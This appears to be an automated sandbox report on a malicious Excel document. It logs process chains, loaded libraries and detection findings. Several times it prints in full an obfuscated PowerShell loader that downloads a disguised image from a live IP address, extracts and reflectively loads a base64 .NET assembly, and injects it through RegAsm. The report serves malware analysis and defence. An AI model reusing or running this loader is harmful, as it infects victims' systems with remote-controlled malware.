Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: 56630000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Swift tract-20240506_120.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

.NET source code contains potential unpacker

Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 9.2.powershell.exe.624c918.3.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 9.2.powershell.exe.6961e7c.2.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { 